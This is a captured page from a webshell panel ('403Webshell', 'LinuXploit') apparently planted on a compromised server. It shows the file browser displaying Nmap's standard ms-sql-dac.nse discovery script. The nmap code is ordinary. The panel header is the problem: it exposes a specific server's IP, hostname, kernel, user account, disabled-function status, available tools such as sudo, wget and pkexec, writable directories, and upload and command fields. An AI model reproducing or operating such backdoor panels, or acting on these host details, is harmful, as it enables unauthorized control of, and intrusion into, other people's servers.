403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /usr/share/nmap/scripts/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /usr/share/nmap/scripts/ms-sql-dac.nse
local coroutine = require "coroutine"
local mssql = require "mssql"
local nmap = require "nmap"
local stdnse = require "stdnse"
local table = require "table"

description = [[
Queries the Microsoft SQL Browser service for the DAC (Dedicated Admin
Connection) port of a given (or all) SQL Server instance. The DAC port
is used to connect to the database instance when normal connection
attempts fail, for example, when server is hanging, out of memory or
in other bad states. In addition, the DAC port provides an admin with
access to system objects otherwise not accessible over normal
connections.

The DAC feature is accessible on the loopback adapter per default, but
can be activated for remote access by setting the 'remote admin
connection' configuration value to 1. In some cases, when DAC has been
remotely enabled but later disabled, the sql browser service may
incorrectly report it as available. The script therefore attempts to
connect to the reported port in order to verify whether it's
accessible or not.
]]

---
-- @usage
-- sudo nmap -sU -p 1434 --script ms-sql-dac <ip>
--
-- @output
-- | ms-sql-dac:
-- |_  Instance: SQLSERVER; DAC port: 1533
--

author = "Patrik Karlsson"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discovery", "safe"}

hostrule = function(host)
  if ( mssql.Helper.WasDiscoveryPerformed( host ) ) then
    return mssql.Helper.GetDiscoveredInstances( host ) ~= nil
  else
    local sqlBrowserPort = nmap.get_port_state( host, {number = 1434, protocol = "udp"} )
    if ( (stdnse.get_script_args( {"mssql.instance-all", "mssql.instance-name", "mssql.instance-port"} ) ~= nil) or
        (sqlBrowserPort and (sqlBrowserPort.state == "open" or sqlBrowserPort.state == "open|filtered")) ) then
      return true
    end
  end
end

local function checkPort(host, port)
  local s = nmap.new_socket()
  s:set_timeout(5000)
  local status = s:connect(host, port, "tcp")
  s:close()
  return status
end

local function discoverDAC(host, name, result)
  local condvar = nmap.condvar(result)
  stdnse.debug2("Discovering DAC port on instance: %s", name)
  local port = mssql.Helper.DiscoverDACPort( host, name )
  if ( port ) then
    if ( checkPort(host, port) ) then
      table.insert(result, ("Instance: %s; DAC port: %s"):format(name, port))
    else
      table.insert(result, ("Instance: %s; DAC port: %s (connection failed)"):format(name, port))
    end
  end
  condvar "signal"
end

action = function( host )
  local result, threads = {}, {}
  local condvar = nmap.condvar(result)

  local status, instanceList = mssql.Helper.GetTargetInstances( host )
  -- if no instances were targeted, then display info on all
  if ( not status ) then
    if ( not mssql.Helper.WasDiscoveryPerformed( host ) ) then
      mssql.Helper.Discover( host )
    end
    instanceList = mssql.Helper.GetDiscoveredInstances( host )
  end

  for _, instance in ipairs(instanceList or {}) do
    local name = instance:GetName():match("^[^\\]*\\(.*)$")
    if ( name ) then
      local co = stdnse.new_thread(discoverDAC, host, name, result)
      threads[co] = true
    end
  end

  while(next(threads)) do
    for t in pairs(threads) do
      threads[t] = ( coroutine.status(t) ~= "dead" ) and true or nil
    end
    if ( next(threads) ) then
      condvar "wait"
    end
  end

  return stdnse.format_output( true, result )
end


Youez - 2016 - github.com/yon3zu
LinuXploit